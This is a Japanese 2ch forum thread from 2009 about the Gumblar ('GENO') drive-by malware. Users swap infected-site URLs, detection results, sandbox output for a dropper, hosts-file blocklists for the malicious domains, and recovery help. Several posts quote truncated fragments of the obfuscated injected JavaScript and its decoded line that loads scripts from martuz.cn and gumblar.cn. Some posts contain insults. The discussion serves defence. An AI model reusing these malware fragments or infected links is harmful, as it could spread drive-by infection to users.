セキュリティソフトでブロックする方法とルータでブロックする方法がある。
とりあえずルータの有無と使用しているセキュリティソフトを書いて。
159:192.168.0.774
09/05/17 14:09:06 TTgW4pHv0
>>64
GENOウィルスチェッカーだとひっかがらんよ
チェッカーは、まだだめみたいね
160:192.168.0.774
09/05/17 14:09:07 77O8s7yk0
>>157
他の対策は済んだのか? 先にそっちをやっていれば5.に関してはそれほど神経質にならなくていい。
これからもソフトのアップデート情報には注意してください。
161:192.168.0.774
09/05/17 14:10:30 T9pTie3x0
これも一応置いとく
前スレか何処かに落ちてた
URLリンク(www.dotup.org)
パスはGENO
162:192.168.0.774
09/05/17 14:13:51 LQE1Ao+t0
>>158 ルーターは NEC Aterm WR8500N セキュリティソフトはavast!です。
>>160 他のはすべて終わっています。一応念のためにも、と
163:192.168.0.774
09/05/17 14:18:21 G0FsAaa+0
御社のHPがウィルスに感染し、改竄されております。
改竄により御社ホームページを閲覧した一般のお客様まで次々と感染してしまう状態となっており、
現在御社が意図せぬ加害者となってしまっております。
被害を拡大を最小限に抑えるためにも、早急なご対応をお願い致します。
以下このウィルスについての説明を添えさせていただきます。
---
こんな感じで以下>>109路線の文章を貼り付けるのはどうだろう
読んで理解できる人がメールを受け取れば読むだろうが、理解できない人が見たときでも緊急性が伝わるように簡潔な前置きをおくべきかと
だが>>120路線だとセキュリティソフトの売りつけやサービスの営業スパムに見える気がする
・HPが改竄されている
・意図せぬ加害者となっている
・早急な対応を!
ということだけは伝える必要があるよな
これだきちんと伝われば理解できる人にパスされるだろうし、理解できる人がメールを受け取ったら自分でちゃんと読むだろう。
164:192.168.0.774
09/05/17 14:20:24 77O8s7yk0
どうせ休日明けまで対処はないし、出社したら状況は把握するだろ。
165:blocktxt
09/05/17 14:24:07 6zykGUMd0
一行だけですけど95.129.144.0-95.129.145.255
追加しておきました。教えて君が増えるのでパス付けました。
パスは zlkonの2009/04/27(月)時点の○○○○○個数
住人ならわかるはず、CIDRはありません・・・変換マンドクセ
URLリンク(www.rupan.net)
166:192.168.0.774
09/05/17 14:24:30 ilxyL7Fy0
>>156
TOPページは引っ掛かったが、リンクされている他のページの幾つかがVirusTotalではスルーになってました。
実際にAvastでアクセスしたのではなく、ダウンローダで感染サイトのTOPページのhtmlを取得。
エディタで開いてリンク先を片っ端からダウンローダで取得。拾ったうちの幾つかは、Avastスルー。
(8~9割は検知してましたが、昨日拾った検体の中での話)
Avastに提出済みなので、近いうちには対応されるかと思いますが、難読化されたスクリプトには
複数のバリエーションがあるので、今後もすり抜けるケースも存在すると思いますから、
○○(今回はAvast)入れておけば大丈夫といった表現は避けた方がいいと思います。
167:192.168.0.774
09/05/17 14:26:27 2KRNOGSH0
>>163
それでいいと思う。
これまでにも
「サイトを閲覧していたユーザーからの連絡があったため調査し見ると~に感染していると判明した」ってのは多い。
十分に内容は伝わっていると思うから、早速出した方が良いと思う。
168:192.168.0.774
09/05/17 14:29:35 2KRNOGSH0
あっちのスレが終わりそうだが、こっちに来る気か?
169:192.168.0.774
09/05/17 14:30:17 1tk6kEt+0
>>162
Avast!にはファイヤーウォール機能がないから、ファイヤーウォールアプリを
入れてブロックするIPを設定するか、ルータのIPフィルタリング機能を使う。
ルータの場合、
URLリンク(www.aterm.jp)
を参考に。
170:192.168.0.774
09/05/17 14:30:29 VGi2lcCh0
>>166
いくつか晒されたスクリプトを見る限りだとUA偽装も多少は有効そうなんだが、
実際のところはどうなんだろう。
まぁ条件式変えられる可能性が高いから安全とは全然言いがたいが。
171:本スレ誘導
09/05/17 14:33:19 789Se66x0
>1
乱立すんな死ね!!!!!!!!!!!!!!!!!!!
本スレはこっちな
GENOウイルススレ ★11
スレリンク(sec板)
172:192.168.0.774
09/05/17 14:34:02 VCQZY8+a0
お前ら落ち着け!今は争ってる場合じゃない!
173:192.168.0.774
09/05/17 14:34:27 ov4CW62y0
>>165
gumbか、入ってた。
スレリンク(sec板:239-240番)
174:192.168.0.774
09/05/17 14:34:39 Sggs+C2i0 BE:508226292-S★(636363)
>>239
avastはファイアウォールがついてないのでそちらの方の対策は大丈夫ですか?
もし、対策されていたら余計なお世話ですみません。
175:192.168.0.774
09/05/17 14:35:26 Sggs+C2i0 BE:451757344-S★(636363)
>>174
すみません失礼しました。誤爆しました。
176:192.168.0.774
09/05/17 14:35:36 ilxyL7Fy0
Avast常駐中に「JS:Redirector-H ~ JS:Redirector-H9」か、類似の名称で検知した場合は
zlkon.lv/gumlar.cn/martuz.cn からマルウェアを落とそうとするページである可能性が高い…程度の表現かなぁ。
JS:Redirector-H(無印),JS:Redirector-H2,JS:Redirector-H4,JS:Redirector-H7,JS:Redirector-H9は
手元の検体で確認済み。
177:192.168.0.774
09/05/17 14:35:36 Ts61gYp70
お前意地張ってないで
本スレ見た方がいいぞ
今あっちでは双葉ちゃんねるが感染したって騒ぎになってるから
178:192.168.0.774
09/05/17 14:35:40 LQE1Ao+t0
>>169 おおどうもです。そんなサイト探してました。とりあえずルーター設定でやってみます。
179:192.168.0.774
09/05/17 14:36:01 1l1Ze1DVP
どこが本スレだよ
教えやがれ奴隷ども
180:192.168.0.774
09/05/17 14:36:07 1tk6kEt+0
>>166
なるほど。了解。
そこまでやってなかったわ。
181:192.168.0.774
09/05/17 14:36:34 ov4CW62y0
>>173
ごめん、1行目コピペ忘れてたは
182:192.168.0.774
09/05/17 14:37:31 zd6xXlce0
>>179
奴隷スレ
スレリンク(soccer板)
183:192.168.0.774
09/05/17 14:37:46 VCQZY8+a0
取り敢えずうちのPCは感染していない事が判ったので
俺はバスターの対応を待つ
それまでPCではここと2ちゃんしかみない
ミクシィも携帯のみにするわ
184:192.168.0.774
09/05/17 14:41:08 LQE1Ao+t0
[セキュリティ版]GENOウイルススレ ★10でID表示される掲示板が良いと言う事になって、
こっちにスレが立つことになりました。★11は立てないはずだった様ですけど。
185:192.168.0.774
09/05/17 14:41:19 YGxJUpFP0
すみません少しテンパってます、知恵を貸してください
スレチなら誘導して頂けると幸いです
普段ブラウザはもっぱら火狐だがこの機会にIEも最新のにしておくかと8を用意
↓
インスコ失敗しましたので再起動推奨しますよ!にホイホイ釣られてうっかり再起動
↓
何故か青くはならなかったけどデスクトップ壁紙のみ/(^o^)\
↓
辛うじて記憶していたショートカットでタスクマネージャ起動
↓
新しいタスクの実行から専ブラ起動←今ココ
テンプレの症状で確認できていたのは以下のみ
①cmd.exe、regedit.exeが起動しない
②sqlsodbc.chmのファイルサイズがおかしい
CPU使用率は常と変わらず、使っているのはWinXPSP3 2GBです
リカバリするにも何処から仕掛けて良いのやらorz
186:192.168.0.774
09/05/17 14:41:40 ilxyL7Fy0
>>156
あったあった。
昨日検体提出時点(0/40)
URLリンク(www.virustotal.com)
今、再確認したけど、やっぱりスルー(0/40)
URLリンク(www.virustotal.com)
アドレスはこれかな
sound■jp/yudai_marimba/
他にも2つ位、Avastスルーだけどしっかりスクリプトが挿入されているページがありました。
1つ出てきたから、あとはもういいか。
昨日の時点で入っていたもの。
|<script language=javascript><!--
|(function(ljk8K){var q0UFt='%';var ikN7=('va_72_20a_3d_<以下略>
| --></script>
187:192.168.0.774
09/05/17 14:42:16 VPbnNWIB0
>>185
感染確定
188:192.168.0.774
09/05/17 14:44:04 weq4pQS+0
スレを見てたらブラウザがウイルスに感染した、みたいなの出てきたがこれは違うやつか
189:192.168.0.774
09/05/17 14:44:33 um/XFnMU0
>>185
ご愁傷様でした。
とっととクリーンインスコしてください
190:192.168.0.774
09/05/17 14:46:16 q8u6cZFi0
>>185
どっから感染したんだろう…
余裕でアウトだな
191:192.168.0.774
09/05/17 14:47:07 MpyKmePW0
>>188
関係ない
つ「ノートントラップ」
192:192.168.0.774
09/05/17 14:47:55 weq4pQS+0
あんまり興味なかったからノートンでもavastでもなくてAVGなんだが
193:192.168.0.774
09/05/17 14:48:20 NFeyfEj00
Adobe ReaderとFlash Playerを最新のにしたんですが
Javascriptとかはよく分からないので放置してます。
とりあえず最新版使ってればセキュリティーホール突かれることもなく
安全なんですよね?
194:192.168.0.774
09/05/17 14:49:33 um/XFnMU0
今はね
195:192.168.0.774
09/05/17 14:49:42 1tk6kEt+0
>>186
おお、さんきゅ。
早速踏んでみたが、確かにAvast!無反応だな。
どういうロジックでAvast!は判定してるんだろ?
unescapeを解読してるわけじゃないってことか。
196:192.168.0.774
09/05/17 14:50:55 YpVuMiqJ0
avastからAviraAntivirに乗り換えた途端にavastが本気出してきて乗り換えたくなってきたぜ
197:192.168.0.774
09/05/17 14:51:32 77O8s7yk0
>>193
まあそれでOK。他のソフトも含めて、今後もアップデート情報はチェックしとこう。
198:192.168.0.774
09/05/17 14:53:04 Um/4qeYR0
このサイト見たらアヴァストが反応するんだけどどうなの?
反応したってことは大丈夫なんだろうけど・・・
一応閲覧注意な
HTTP;//pmpk.dojin.com/
199:192.168.0.774
09/05/17 14:53:06 z5ZKMxe60
hxxp://www.ukokkei.co.jp/company/index.html
だが、
会社概要の
株式会社烏骨鶏
〒920-0024 石川県金沢市西念4丁目21番18号
TEL 076-232-4255
FAX 076-233-0405
Mail info@ukokkei.co.jp
じゃだめなん?
200:192.168.0.774
09/05/17 14:53:27 7Fj5Ju7c0
>>186
F-Secureユーザですが、F-Secureへ検体提供したほうがいいですか?
201:192.168.0.774
09/05/17 14:54:44 7TaPV4fL0
急に流れが速くなったな
202:192.168.0.774
09/05/17 14:54:47 buHp3trp0
セキュリティソフトの会社って自作自演とかしてるの?
自分でウイルス作ってばらまいて他社より早く定義更新してユーザーに賞賛されるとかさ
203:192.168.0.774
09/05/17 14:55:02 OUF99NvG0
Adobe Reader9.1.1公開日が5/13
今回GENOウイルスがターゲットにした脆弱性は
このバージョンから対策OKなのか3/11の9.1.0で対策OKだったのかどっちかな?
204:192.168.0.774
09/05/17 14:55:15 YGxJUpFP0
>>185です
本気でデスクトップが壁紙だけで寂しいです
アイコンもバーも無い・・・
CDとか用意した記憶がないのですがそれでもリカバリは可能でしょうか?
グーグル先生に聞いても「まずCDを作成します」から始まる絶望感
205:192.168.0.774
09/05/17 14:55:24 t97Zp0ei0
>>202
お前頭いいな
206:192.168.0.774
09/05/17 14:57:32 VPbnNWIB0
>>204
機種名ぐらいかけ
207:192.168.0.774
09/05/17 14:58:26 ov4CW62y0
>>203
Flash Playerは10.0.22.87と9.0.159.0が脆弱性を修正したver
Adobe Readerは7.1.1と8.1.4と9.1.0が脆弱性を修正したver
以降は別物の脆弱性ver
208:192.168.0.774
09/05/17 14:58:50 MpyKmePW0
>>204
タスクマネージャいけるなら
新しいタスクの実行→explorer
でタスクバーとか出るんじゃね
209:192.168.0.774
09/05/17 14:59:32 ilxyL7Fy0
>>200
提出済みです。
210:192.168.0.774
09/05/17 14:59:44 YpVuMiqJ0
>>202
それは結構前から言われてる事、本当かどうかは知らん
211:192.168.0.774
09/05/17 15:00:06 6zykGUMd0
>>198
gumblar.cn の現在のステータス
疑わしいサイトとして認識されています。
このウェブサイトにアクセスするとコンピュータに損害を与える可能性があります。
12799 個のドメインを感染させています。
(function(){var IlkQ='%';var xTy7='var>20a>3d>22Sc>72iptE>
6egine>22>2cb>3d>22V>65rsion()+>22>2cj>3d・・・・・・
212:192.168.0.774
09/05/17 15:01:05 ybsV4IQS0
ファイアフォックス使ってんだけど
弾いてくれたから大丈夫って感じなの?
213:192.168.0.774
09/05/17 15:01:34 Z6bHwWLb0
>>193と同じく、Adobe ReaderとFlash Playerを最新にして
Adobe ReaderのJavascriptは切っておいた。
あと今プニル使ってるので
念のためプニルの設定とIEのインターネットオプションの両方で
Javascript無効にしてる。
ただ、IEのJavascriptは実際のところどうなんだろう。
2ch専ブラにまで影響出るので、正直言うと情報収集に少々厄介なんだが。
214:192.168.0.774
09/05/17 15:01:45 7TaPV4fL0
そういや、3週間前にFirefoxやJane Styleのログが
PCシャットダウン→起動後に全飛びしたけど、
このウイルスとは関係ないよね。
215:192.168.0.774
09/05/17 15:02:35 QQBuyEr/0
ブラウザのJavascriptを切るってどうやればいいの?
216:192.168.0.774
09/05/17 15:02:39 DKlwM8ZhP
>>207
以前じゃなくて以降なのか?
217:192.168.0.774
09/05/17 15:02:47 7TaPV4fL0
テンプレに書かれている症状は一切ないし、大丈夫だと思いたい。
218:192.168.0.774
09/05/17 15:03:21 ov4CW62y0
>>216
ごめん、以降は別の脆弱性修正ver
219:192.168.0.774
09/05/17 15:04:09 ilxyL7Fy0
検出可否スレより最新情報を転記
最新の落とされてくる本体ファイルの検出結果。こんな状況なので、セキュリティベンダーの対応を待って
除去してもらおうとか考えるよりも、感染が疑われる(HPを更新したPCとか、踏んじゃった人とか)は
PCリカバリ(OS再インストール)以外の解決策は推奨できないようです。
martuz_cn_id2_20090517.pdf
MD5 :3cdbaee0c533809e43c6b815884763ff
URLリンク(www.virustotal.com) (2/40)
martuz_cn_id10_20090517.exe
MD5 :b0ca69853b371ec9eb58829e869f6f10
URLリンク(www.virustotal.com) (3/40)
220:192.168.0.774
09/05/17 15:06:25 2kKhzap+0
>>218
もちつけ
221:192.168.0.774
09/05/17 15:06:50 HpOylDYR0
USBメモリでも感染る?
222:192.168.0.774
09/05/17 15:07:36 OUF99NvG0
>>207
サンクス
ということは3月のアップデートをきっちりしておけば
こいつに関してはとりあえずOKということだね
223:192.168.0.774
09/05/17 15:07:41 DKlwM8ZhP
>>218
そういう意味か
脆弱性復活したのかと思ったw
224:212
09/05/17 15:07:54 ybsV4IQS0
ちょwww誰か教えてくださいwww
このままじゃトイレにもいけねぇ
225:192.168.0.774
09/05/17 15:09:26 +t63J1Bn0
本スレ見てきたんだが、なんかもうGENO付きURL配布とかしてるし
感染は拡大する一方だな
俺なりにまとめてみた
URLリンク(geocities.com)
追加あったら気軽に書いてくれ
226:192.168.0.774
09/05/17 15:10:34 7yrlZLjk0
>>224
かけちゃえかけちゃえ
227:192.168.0.774
09/05/17 15:10:37 yV8RyIy+0
>>185
ubuntsかなにかのLive CDは用意できないのか?
感染状態でexplorer起動しても、右クリックのコンテキストメニューが
使えないはずだからPC単体ではもはや復帰できないと思う。
あるいはもう一台HDDがあれば、感染したHDDを抜いて、別HDDに
OSをインストールすれば復旧の方法はある
228:192.168.0.774
09/05/17 15:10:57 xLw+W3X80
>>219
検出できるベンダーもバラバラだしウイルスの詳細知らずに結果だけ見たら誤検出?ってレベルじゃないか・・・
229:192.168.0.774
09/05/17 15:11:55 BvZF1aRY0
最新版に更新しても新種が出るかもしれないから安心できないお……
だからadobe削除したお!
230:192.168.0.774
09/05/17 15:12:17 NtSEuLT8Q
感染サイトのURL貼ってる奴、マジで氏ねよ。
231:212
09/05/17 15:12:25 ybsV4IQS0
┃
┃ ____
┃/⌒ ⌒ \
┃ (―) (―) \
┃⌒(__人__)⌒ |
┃ |
┃ /
┃ヽ  ̄/
┃ \ ,;∴~;゚,。
┃ ヽ_)つ'∴・゚゚。∴.;
┃ (::)(::) ヽ ~;゚
┃ / 〉 ) >>226
┃ (___)
232:185
09/05/17 15:16:45 YGxJUpFP0
>>206
WinXPSP3って機種名ではないのでしょうか?
メーカーはマウスです
>>208
ありがとうございます!バー出ました
只今、先生に相談しながらクリーンインストールに挑戦中です
233:192.168.0.774
09/05/17 15:17:56 6zykGUMd0
URLリンク(www3.atword.jp)?とおもったら/
234:192.168.0.774
09/05/17 15:19:02 BSZ5z9KU0
Adobe Readerは9.1.1が最新型じゃないの?
235:192.168.0.774
09/05/17 15:19:05 +Enx2Z7OP
クリーンインストールって面倒なん?
236:192.168.0.774
09/05/17 15:22:35 zPBL8LWuO
>>235
時間かかるし
データも真っ白になるよ
237:192.168.0.774
09/05/17 15:22:38 2KRNOGSH0
>>225
良く分からないけど、それ、誰でも書き込みできるようになってんの?
なってるなら、感染サイトへのリンク張るヤツ出てくるから、
他のヤツに権限を与えない方がよいよ。
そのあたりは大丈夫だと思うけど。
238:192.168.0.774
09/05/17 15:24:42 7TaPV4fL0
AdobeのFlashとReaderを最新にしていたら
感染サイトを踏んでも大丈夫という情報を広めてきます。
239:192.168.0.774
09/05/17 15:29:08 /4yp3BhL0
2ちゃんの専ブラはだいじょうぶなんかねぇ。
オレJaneDoeViewだけど情報収集はここしかわからんのが困るわw
240:192.168.0.774
09/05/17 15:30:27 7TaPV4fL0
URLは極力踏まないようにすればいいよ
241:192.168.0.774
09/05/17 15:30:42 gvZ9d8TtP
ソフ板も見るといいよ
242:192.168.0.774
09/05/17 15:31:20 rsI8zkAT0
>>239
専ブラは平気
243:192.168.0.774
09/05/17 15:32:26 Dx3JCXno0
>>241
URLを張っていただくとありがたい
244:192.168.0.774
09/05/17 15:33:07 Z6bHwWLb0
>>242
IEコンポーネントでも?
245:192.168.0.774
09/05/17 15:33:15 gvZ9d8TtP
ソフトウェア
URLリンク(pc12.2ch.net)
普通ここまでしない
246:192.168.0.774
09/05/17 15:34:25 1tk6kEt+0
しかし、Adobe Readerはわざと常駐を切らない限り、Adobe Updaterが
更新を知らせてくれるけど、Flashはヤバいね。
大手サイトでフラッシュ使ってるところは要求バージョンを常に最新に
してほしいもんだ。
247:192.168.0.774
09/05/17 15:35:11 Dx3JCXno0
>>245
ありです
248:192.168.0.774
09/05/17 15:35:31 7TaPV4fL0
そりゃないよ
249:192.168.0.774
09/05/17 15:37:28 vH8KoEBz0
>>237見てまともなリンク先かと思って225踏んじまったじゃねーかw
250:192.168.0.774
09/05/17 15:43:52 7yrlZLjk0
>>246
むしろフラッシュを使わないで欲しい
251:192.168.0.774
09/05/17 15:48:45 7TaPV4fL0
うぉっかないなぁ
252:192.168.0.774
09/05/17 15:49:21 6zykGUMd0
アクセス制限中です。しばらく経ってからアクセスしてください。
※ 現在、大規模な攻撃を受けており、このシステムを導入しています。
ご迷惑をかけてすいません。 (o*。_。)oペコッ
チェッカー ><
253:192.168.0.774
09/05/17 15:59:54 MP/sWvjo0
GENOウイルスチェッカー
今入ってるけど まさか俺のせいじゃないよね。
254:192.168.0.774
09/05/17 16:00:53 ilxyL7Fy0
>>219
exeの方を、Normanのサンドボックスに投げ込んだ結果の回答をコピペ
前は34.exeとu.batだったのがファイル名変わってるなぁ。
[ DetectionInfo ]
* Filename: C:\analyzer\scan\martuz_cn_id10_20090517.exe.
* Sandbox name: NO_MALWARE
* Signature name: NO_VIRUS.
* Compressed: YES.
* TLS hooks: YES.
* Executable type: Application.
* Executable file structure: OK.
* Filetype: PE_I386.
[ General information ]
* Decompressing UPX3.
* File length: 15872 bytes.
* MD5 hash: b0ca69853b371ec9eb58829e869f6f10.
[ Changes to filesystem ]
* Creates file C:\_.e.
* Deletes file c:\sample.exe.
* Creates file C:\e.bat.
* Deletes file "c:\_.e" .
* Deletes file "c:\e.bat".
[ Changes to registry ]
* Accesses Registry key "HKLM\SoFtWARE\Microsoft\Windows nT\currentversion\Drivers32".
[ Process/window information ]
* Creates process "CMD.EXE".
[ Signature Scanning ]
* c:\sample.exe (15872 bytes) : no signature detection.
* C:\_.e (15872 bytes) : no signature detection.
255:192.168.0.774
09/05/17 16:02:33 MDg7JZzS0
ウィルスバスターは何してるの?
256:192.168.0.774
09/05/17 16:05:39 VMAXjN900
お前らウイルスセキュリティ馬鹿にしてるけどいい加減にしろよ?
2ちゃんの連帯感みたいなの感じちゃって調子に乗ってるんだろ?
正直、 うざいから死んでwww(爆藁
信者とか妄想してる暇があったら親孝行しろw糞ww
どうせリアルじゃペコペコしてんだろw
ウイルスセキュリティ以下の人間だよね?
君たちww
妄想と批判しか出来ない哀れな奴らw
ウイルスセキュリティ叩いてどうなる?
お前らマヂ頭使えw
257:192.168.0.774
09/05/17 16:06:51 ovH4yFdR0
>>255
更新キターって聞いたけど自分のところでは黙ったままだ
258:192.168.0.774
09/05/17 16:07:03 MDg7JZzS0
ウィルスバスターいれてるんだけど役に立たないの?
対応してくれないの?
259:192.168.0.774
09/05/17 16:08:37 61lOiijw0
pdf見るのにFoxitReader使ってて、AdobeReaderはインスコしてないんだが、
これってFoxitReader経由でも感染するのか?
260:192.168.0.774
09/05/17 16:09:40 F5MPX4G50
>>246
それはいいね、前回のGENO騒動までアップデートを全くしてなかったから危なかった
261:192.168.0.774
09/05/17 16:12:35 MP/sWvjo0
>>257
俺のノートンもライブアップデートが沈黙してた。
仕方ないので手作業で定義ファイル落としてきた。あくまでもノートンの話。
xxxp://www.omora.pink-no1.net/の入った先menu/menu1.htmlが
危険度200%
かなり危険なURLです。友人のPCを壊すのに利用しましょう!
絶対に踏んではいけません。
これ危ないのかな?
262:blocktxt
09/05/17 16:18:29 6zykGUMd0
前のうpろだ理由は分からないけど削除されたみたいなんで
こっちに上げておきます。
URLリンク(uproda.2ch-library.com)
263:192.168.0.774
09/05/17 16:18:48 KdAQNY9c0
テメーのサイト見たらウィルスに感染したぞゴルァ路線はどうだろう
264:192.168.0.774
09/05/17 16:19:19 1tk6kEt+0
>>261
ここにはGenoいないっぽいけどな。
リンク先に潜んでるんだろうか。
265:192.168.0.774
09/05/17 16:22:29 MP/sWvjo0
>>264
㌧。一応入らないにしとく。
266:192.168.0.774
09/05/17 16:22:31 Grc1h74N0
脅威だな
救急車依頼の恐怖を感じてるんだけど
267:192.168.0.774
09/05/17 16:23:07 oRKg9iVz0
>>266
どんだけ大昔のだよww
268:192.168.0.774
09/05/17 16:29:20 MDg7JZzS0
ウイルスバスターはなにしてるの?
なにもしないの?
269:192.168.0.774
09/05/17 16:30:53 f7PXip0E0
GENOウイルス対策
■hostsファイル書き換え
hostsファイルに以下の行を追加
127.0.0.1 zlkon.lv
127.0.0.1 gumlar.cn
127.0.0.1 martuz.cn
↑これをちょっと説明して頂けませんか?
270:192.168.0.774
09/05/17 16:33:10 7TaPV4fL0
zlkon.lv
gumlar.cn
martuz.cn
に飛ぼうとすると127.0.0.1に飛ぶってことです。
要するに本来のIPに飛ぼうとするのを防止します。
271:192.168.0.774
09/05/17 16:36:06 CuLRuFv70
>>269
右側のzlkon.lvとかにアクセスしようとする
↓
hostsの内部処理で127.0.0.1に読み替えてそこにアクセスする
↓
127.0.0.1は自分自身なので本当のzlkon.lvのIPアドレスにはアクセスしない
↓
安全
272:192.168.0.774
09/05/17 16:36:26 MDg7JZzS0
ウィルスバスターな何やってるんだよ
早くしてくれよ
感染してるかもしれないのに
273:192.168.0.774
09/05/17 16:36:46 0CtfCDPI0
>>186
これも martuz.cn に飛ばすんだな
<script src=//ma"+"rtuz.cn/vid/?id="+j+"><\/script>
martuz.cnにアク禁くらわせるだけでかなり防げそうだな、こりゃ
274:192.168.0.774
09/05/17 16:37:45 7UVnacRX0
www■laqoo.net■kyouun■pet■index.html
でavast先生がredirector H8検知した。
侵入前にブロックできたって認識でいいのかなぁ。
おかしな挙動は見られないが
275:192.168.0.774
09/05/17 16:40:59 uRUXabUv0
>>269
初期の頃は直接IPが記述してあって、感染中に.exeをダウンロードする為そこに繋ごうとしていた。
ウィルス対策ソフトでそのIPがBANされつつある中、zlkon.lvとかgumlar.cnとか適当なドメイン名を経由して.exeのダウンロードを行おうとする手段が登場
ソフトの対策遅れでまだその経由した方からは繋がっちゃったりが有るんで、
windows標準の "ホスト名>IPの変換を手動で上書きする" 方法によってzlkon.lvやgumlar.cnに繋がないようにする
276:192.168.0.774
09/05/17 16:41:05 0CtfCDPI0
>>198
gumblar.cn にご案内~
<script src=//gumblar.cn/rss/?id="+j+"><\/script>
277:192.168.0.774
09/05/17 16:42:04 W3Qz58cJ0
>>262
落としたいけど元々住人じゃないんでパスが判らんです
GENOじゃないですよね?
278:192.168.0.774
09/05/17 16:45:11 f7PXip0E0
>>270
ありがとうございます
127.0.0.1がマシン自体を表すアドレスってことは、今調べて分かったのですが
firefoxのAdblock Plusのフィルタリストに「zlkon.lv」「gumlar.cn」「martuz.cn 」
を入れても阻止できるんでしょうか?
279:192.168.0.774
09/05/17 16:48:13 f7PXip0E0
>>271
リロードし忘れたorz
分かりやすい説明ありがとうございます
280:192.168.0.774
09/05/17 16:49:30 6zykGUMd0
>>274
(function(rzm){var x34p='%';eval(unescape(
('v.61r.20a.3d.22.53cript.45ng.69ne.22.2cb.3d.22Version()+・・・・・・
URLリンク(www.virustotal.com)
281:192.168.0.774
09/05/17 16:51:53 0CtfCDPI0
>>264 いないよね。でもこんなスクリプトの化け物みたいなページにはブラウザでアクセスしたくないわw
282:192.168.0.774
09/05/17 16:54:08 61lOiijw0
ググったけどAdobeReaderインストールしてなくてFoxit使っててもヤバいのね・・・
Foxitも環境設定でJavaScript切らないと駄目か
283:192.168.0.774
09/05/17 16:55:23 6zykGUMd0
>>264
無し
284:192.168.0.774
09/05/17 17:01:44 7UVnacRX0
>>280
本件まんまですなぁ(´-`)
なんでペットの名前サイトなんかがやられてんだよw
恐ろしくてWEB周れないじゃんこれ
285:192.168.0.774
09/05/17 17:01:54 0CtfCDPI0
>>274
gumblar.cn ご案内コース
<script src=//gumblar.cn/rss/?id="+j+"><\/script>
286:192.168.0.774
09/05/17 17:02:08 LQE1Ao+t0
>>282 俺も使ってる それ気になるな。
287:192.168.0.774
09/05/17 17:11:33 gLr/8LT/0
hostsファイルに以下の行を追加というのは
上と同じように#の中に入れればいいのでしょうか
288:192.168.0.774
09/05/17 17:12:13 MP/sWvjo0
>>264>>281>>283 お手数お掛けしました。
~かなり判定厳しめに設定してあります。~
あっちを立てるとコッチが立たず な感じみたいですね。
289:192.168.0.774
09/05/17 17:13:54 CuLRuFv70
>>287
#はその行を無効にする(コメント扱いにする)から不要
127.0.0.0 localhost
というのが普通は最初に入ってるはずだからそれと同じ書き方
290:192.168.0.774
09/05/17 17:14:57 1tk6kEt+0
>>287
先頭に#があるのはコメント行。
#なしで行追加。
291:192.168.0.774
09/05/17 17:16:51 1tk6kEt+0
>>289
なぜか数ヶ月前にWindows Defenderがlocalhostの記述行を削除したよ。
292:192.168.0.774
09/05/17 17:19:00 q8u6cZFi0
やっぱここが一番建設的なスレだな
293:192.168.0.774
09/05/17 17:22:25 gLr/8LT/0
>>289-290
ありがとうございました
294:192.168.0.774
09/05/17 17:23:07 f7PXip0E0
>>278誰か分かりませんでしょうか?
295:192.168.0.774
09/05/17 17:25:09 1tk6kEt+0
>>294
たぶん大丈夫だと思うけど、hosts書きかえちゃった方がより確実。
296:192.168.0.774
09/05/17 17:28:02 0CtfCDPI0
>>294
adblockがどんなもんかは知らんけど、firefoxしか使わないんなら大丈夫なんじゃね?
ただサイトはこれからもどんどん増えるので、この3つさえ入れときゃ明日も安心ってわけじゃないんだけどね
adobeを最新にして全てを忘れるのが一番幸せかも試練
297:192.168.0.774
09/05/17 17:30:02 f7PXip0E0
>>295-296
ありがとうございます、気を付けます
298:192.168.0.774
09/05/17 17:32:19 6zykGUMd0
Spybot - Search & Destroy もhosts書き換えますね
299:192.168.0.774
09/05/17 17:39:49 7TaPV4fL0
はい。
300:192.168.0.774
09/05/17 17:49:24 6zykGUMd0
martuz.cnノートンが対応
URLリンク(safeweb.norton.com)
301:192.168.0.774
09/05/17 17:49:53 7TaPV4fL0
ノートンGJ
302:192.168.0.774
09/05/17 17:58:11 Grc1h74N0
やべえノートンに乗り換えるときがきたかも
303:192.168.0.774
09/05/17 18:01:36 mIA3fiU30
>>300
おお
304:192.168.0.774
09/05/17 18:05:57 O4C38sHjP
今北用ってもう誰か作ってる?
無いなら作るけど
305:192.168.0.774
09/05/17 18:24:33 1tk6kEt+0
>>300
その一方でgumlar.cnは安全。
URLリンク(safeweb.norton.com)
gumlar.cnは実際にもう動作停止状態なのかな?
306:192.168.0.774
09/05/17 18:24:59 Pub4l/uF0
zlkon.lvとgumlar.cnは本当にこのドメインなのか?
SCFに遮断させたら、martuz.cnはおkらしいが、↑二つは「DNSで解決されていません追加しますか?」
だとよ。
307:192.168.0.774
09/05/17 18:25:21 QPPdxGJ80
昨日このウイルスを知って不安だったので書き込みします
【OS】
XP
【使用セキュリティソフト】
avast
【疑った理由】
ニコニコの動画を見る際に『JavaScriptが無効になってます』といったような文字が出て
最新のフラッシュプレイヤーを入れてくださいとの表記が出た。
【症状】
PCがとても重いときがあり、MWPで曲を聴いてたのが音飛びが酷くなり
フリーズ直前までいったこともあった(作業中ではあったが・・・)
【確認手段】
cmd.exe、regedit.exeは使用可能
sqlsodbc.chmのサイズ確認
【結果】
フラッシュプレイヤーを最新にして以降ニコニコは見れるようになった
今のところ怪しげなパケットはなさそうだが不安
308:192.168.0.774
09/05/17 18:28:15 /SoDyIML0
>>300
js切ってても見れるようにしとけよ
309:192.168.0.774
09/05/17 18:28:42 6zykGUMd0
>>305
ほんとだ???
310:192.168.0.774
09/05/17 18:28:53 Pl/Rjd540
>307
報告御苦労
311:192.168.0.774
09/05/17 18:28:59 f7PXip0E0
GENOウイルス対策
■adobe flashplayerを最新版に更新
Adobe Flash PlayerとShockwave Flashって同じものですか?
312:192.168.0.774
09/05/17 18:30:14 Pub4l/uF0
>>311
違う。
313:192.168.0.774
09/05/17 18:32:32 kVP/8H1t0
>>307
それ原因は別だから安心しなさい。
314:192.168.0.774
09/05/17 18:32:51 1tk6kEt+0
>>306
すまん。おれがb抜いちゃってるわw
gumlar.cnでなくgumblar.cnね。
315:192.168.0.774
09/05/17 18:33:56 6zykGUMd0
5/15 21:00ごろにgumblar.cnのAレコードの登録がなくなりました。
Aレコードがなくなりましたのでとりあえずgumblar.cnは意味がなくなりました。ただ、
レジストラによる対策ではない?ようなので
再度Aレコードが登録される可能性があるので、引き続き注意は必要です。
これか?
URLリンク(jvnrss.ise.chuo-u.ac.jp)
316:192.168.0.774
09/05/17 18:34:11 f7PXip0E0
>>312
んじゃあShockwave Flashってのは最新版に更新しなくてもいいんですよね?
更新のしかた分からないけどw
317:192.168.0.774
09/05/17 18:34:48 jSw80LZp0
>>314
何で抜くんだよ
まさか手打ちなのか?普通コピーだろ
